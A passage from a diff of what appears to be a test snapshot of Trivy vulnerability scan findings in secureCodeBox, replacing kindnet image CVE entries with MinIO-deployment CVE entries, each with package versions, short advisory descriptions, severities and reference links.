"https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-2835", + "installedVersion": "v1.9.3", + "packageName": "github.com/coredns/coredns", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-2835", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", + "https://github.com/advisories/GHSA-ch7v-37xg-75ph", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", + "https://www.cve.org/CVERecord?id=CVE-2022-2835", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of ..svc.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "coreDNS: DNS Redirection of Internal Services", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://avd.aquasec.com/nvd/cve-2022-2835", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://access.redhat.com/security/cve/CVE-2022-2835", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://github.com/advisories/GHSA-ch7v-37xg-75ph", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2835", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20305", - "installedVersion": "3.4.1-1", - "packageName": "libnettle6", + "fixedVersion": undefined, + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-2837", + "installedVersion": "v1.9.3", + "packageName": "github.com/coredns/coredns", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20305", - "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - "https://linux.oracle.com/cve/CVE-2021-20305.html", - "https://linux.oracle.com/errata/ELSA-2021-1206.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - "https://security.gentoo.org/glsa/202105-31", - "https://security.netapp.com/advisory/ntap-20211022-0002/", - "https://ubuntu.com/security/notices/USN-4906-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20305", - "https://www.debian.org/security/2021/dsa-4933", + "https://access.redhat.com/security/cve/CVE-2022-2837", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", + "https://github.com/advisories/GHSA-h828-v5pv-33qx", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", + "https://www.cve.org/CVERecord?id=CVE-2022-2837", ], }, "category": "Vulnerability", - "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "nettle: Out of bounds memory access in signature verification", + "name": "DNS Redirection of Top-Level Domains", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20305", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20305", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "value": "https://avd.aquasec.com/nvd/cve-2022-2837", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-2837", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://github.com/advisories/GHSA-h828-v5pv-33qx", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", }, { "type": "URL", - "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2837", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.28.0", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-33955", + "installedVersion": "v0.20.0", + "packageName": "github.com/minio/console", + "references": [ + "https://github.com/advisories/GHSA-jv3f-7m33-qp65", + "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", + "https://github.com/minio/console/releases/tag/v0.28.0", + "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + ], + }, + "category": "Vulnerability", + "description": +"Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0. + +" +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "value": "https://avd.aquasec.com/nvd/cve-2023-33955", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-31", + "value": "https://github.com/advisories/GHSA-jv3f-7m33-qp65", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", + "value": "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4906-1", + "value": "https://github.com/minio/console/releases/tag/v0.28.0", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "value": "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4933", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3580", - "installedVersion": "3.4.1-1", - "packageName": "libnettle6", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3580", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://linux.oracle.com/cve/CVE-2021-3580.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", - "https://security.netapp.com/advisory/ntap-20211104-0006/", - "https://ubuntu.com/security/notices/USN-4990-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3580", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3580", - }, + "name": "handle server errors after sending GOAWAY", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4990-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-14155", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", - "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", - "https://access.redhat.com/security/cve/CVE-2020-14155", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2020-14155.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", - "https://security.netapp.com/advisory/ntap-20221028-0010/", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2020-14155", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.pcre.org/original/changelog.txt", - ], - }, - "category": "Vulnerability", - "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "pcre: Integer overflow when parsing callout numeric arguments", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-14155", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-14155", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://bugs.gentoo.org/717920", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-14155.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0010/", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-14155", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-11164", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", - "references": [ - "http://openwall.com/lists/oss-security/2017/07/11/3", - "http://www.openwall.com/lists/oss-security/2023/04/11/1", - "http://www.openwall.com/lists/oss-security/2023/04/12/1", - "http://www.securityfocus.com/bid/99575", - "https://access.redhat.com/security/cve/CVE-2017-11164", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", - "https://www.cve.org/CVERecord?id=CVE-2017-11164", - ], - }, - "category": "Vulnerability", - "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-11164", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/07/11/3", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/99575", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-11164", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-16231", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - "http://seclists.org/fulldisclosure/2018/Dec/33", - "http://www.openwall.com/lists/oss-security/2017/11/01/11", - "http://www.openwall.com/lists/oss-security/2017/11/01/3", - "http://www.openwall.com/lists/oss-security/2017/11/01/7", - "http://www.openwall.com/lists/oss-security/2017/11/01/8", - "http://www.securityfocus.com/bid/101688", - "https://access.redhat.com/security/cve/CVE-2017-16231", - "https://bugs.exim.org/show_bug.cgi?id=2047", - "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", - "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + 